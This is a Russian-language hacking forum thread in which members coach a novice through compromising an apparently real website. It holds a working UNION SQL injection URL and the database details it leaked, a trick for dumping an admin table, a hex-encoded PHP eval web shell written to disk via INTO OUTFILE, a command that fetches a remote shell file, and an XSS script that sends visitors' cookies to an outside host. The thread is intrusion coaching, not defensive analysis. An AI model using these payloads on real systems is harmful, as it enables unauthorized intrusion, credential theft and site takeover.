21.11.2009, 00:46
|
|
Участник форума
Регистрация: 15.08.2008
Сообщений: 167
Провел на форуме:
3009843
Репутация:
204
|
|
Сообщение от B1t.exe
получаеться все? не получиться раскрутить это?
Если IE обрезает, xss может действовать в других браузерах.
|
|
|
21.11.2009, 01:43
|
|
Постоянный
Регистрация: 06.11.2006
Сообщений: 865
Провел на форуме:
1977708
Репутация:
208
|
|
Сообщение от Shaitan-Devil
Если IE обрезает, xss может действовать в других браузерах.
а тут не получиться использовать тогда php или SQL инексии? а то XSS_ом возится бесполезно. ничего интересного не получу.
|
|
|
|
21.11.2009, 01:47
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
Сообщение от B1t.exe
а тут не получиться использовать тогда php или SQL инексии? а то XSS_ом возится бесполезно. ничего интересного не получу.
Ну тут скуля, тебе ж уже отписали выше
http://www.ru/vn84.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,co ncat(0x27,concat_ws(0x2F,version(),database(),user ()))+from+admin+limit+0,1--+
4.1.22/cctvline_dbb/cctvline_cctv@212.193.224.223
Подбирай названия столбцов таблицы admin
Последний раз редактировалось ElteRUS; 21.11.2009 в 01:56..
|
|
|
|
21.11.2009, 02:29
|
|
Постоянный
Регистрация: 06.11.2006
Сообщений: 865
Провел на форуме:
1977708
Репутация:
208
|
|
ElteRUS
ого )) спасибо. получил точно такое:
'4.1.22/cctvline_dbb/cctvline_cctv@212.193.224.223''
Не хочу выгядеть тупым, но не знаю я парвильно думаю?
4.1.22 - version
cctvline_dbb - database
cctvline_cctv@212.193.224.223 - user ?? (хотя тут не очень понимаю как так)
а что косается таблиц и столбцов - откуда унали, что сушествует таблица admin?
получается, что blind SQL ?
а есть ман какой-то? как вообше подбираеться столбцы(таблицы)..?
|
|
|
|
21.11.2009, 03:29
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме:
14023893
Репутация:
2163
|
|
с именами колонок в 4 версии туговато, квазар читает тему если что подправит наверно), а вообще, можно выводить данные не зная имена колонок,
/vn84.php?id=-1+union+select+*+from+(select+*+from+admin+join+ad min+a+join+admin+b)c--+1
где то мы разбирали это |
|
|
|
21.11.2009, 04:09
|
|
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
Провел на форуме:
950638
Репутация:
256
|
|
Сообщение от B1t.exe
Не хочу выгядеть тупым, но не знаю я парвильно думаю?
4.1.22 - version
cctvline_dbb - database
cctvline_cctv@212.193.224.223 - user ?? (хотя тут не очень понимаю как так)
Ты не видишь в какой они последовательности написанны при sql инъекции?  И что тут не понятного...
Сообщение от B1t.exe
а что косается таблиц и столбцов - откуда унали, что сушествует таблица admin?
Быть может они предположили и попробовали?! Такой метод называется ручной брут...
Сообщение от B1t.exe
получается, что blind SQL ?
Какой ещё блайнд? Вывод на месте...
Сообщение от B1t.exe
а есть ман какой-то? как вообше подбираеться столбцы(таблицы)..?
Ручной брут + процесс можно автоматизировать, иногда в зависимости от особенности основного запроса можно узнать таблицы при помощи procedure analise() и т.д. и т.п.
|
|
|
|
21.11.2009, 06:17
|
|
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
Провел на форуме:
3629857
Репутация:
504
|
|
Сообщение от B1t.exe
cctvline_cctv@212.193.224.223 - user ?? (хотя тут не очень понимаю как так)
Просто MySQL-сервер установлен не на локалхосте, а на удаленной машине. MySQL-сервер имеет адрес и имя пользователя, используемого при коннекте
Сообщение от B1t.exe
а есть ман какой-то? как вообше подбираеться столбцы(таблицы)..?
Так как 4 версия мускула, то таблиц INFORMATION_SCHEMA нет, следовательно таблицы и колонки узнать можно только брутом(ручным или же разными скриптами, которые выкладывали в кодинге. Вроде SIPT тоже умеет)
|
|
|
|
21.11.2009, 10:54
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
Сообщение от B1t.exe
ElteRUS
ого )) спасибо. получил точно такое:
'4.1.22/cctvline_dbb/cctvline_cctv@212.193.224.223''
Не хочу выгядеть тупым, но не знаю я парвильно думаю?
4.1.22 - version
cctvline_dbb - database
cctvline_cctv@212.193.224.223 - user ?? (хотя тут не очень понимаю как так)
а что косается таблиц и столбцов - откуда унали, что сушествует таблица admin?
получается, что blind SQL ?
а есть ман какой-то? как вообше подбираеться столбцы(таблицы)..?
Если file_priv = Y.
Найди полный путь.
Потому
То http://www.ru/vn84.php?id=-1+union+select+null,null,null,null,null,null,null, null,null,null,null,null,0x3C3F206576616C28245F524 551554553545B635D293B203F3E,null,null+INTO+OUTFILE +'/полный/путь/inaex.php'--+
Далее если всё норм.
Нужно allow_url_fopen = on.
?с=copy($_GET[a], $_GET[b]);&a=http://site/shell.txt&b=inbex.php
(Да да inbex.php)
|
|
|
|
21.11.2009, 09:18
|
|
Познающий
Регистрация: 16.11.2009
Сообщений: 38
Провел на форуме:
261594
Репутация:
15
|
|
Во многих статьях идет описания ворования куков с помощью xss.
Я как бы нашел все но вот уже часа 2 не догоняю что делает картинка 1x1px и куда сохрянятся куки? во многих статьях написанно про картинку
<script>
img = new Image();
img.src = "http://antichat.org/s/HakNet.gif?"+document.cookie;
</script>
а что она делает? куда куки сохранятся? |
|
|
|
21.11.2009, 10:32
|
|
Banned
Регистрация: 24.07.2009
Сообщений: 85
Провел на форуме:
229533
Репутация:
43
|
|
можно ли в joomla 1.0.15 залить шелл при условии, что компоненты ставить нельзя, php= safe mode? установленных бажных компонентов на первый взгляд нет, вход в админку имеется  |
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
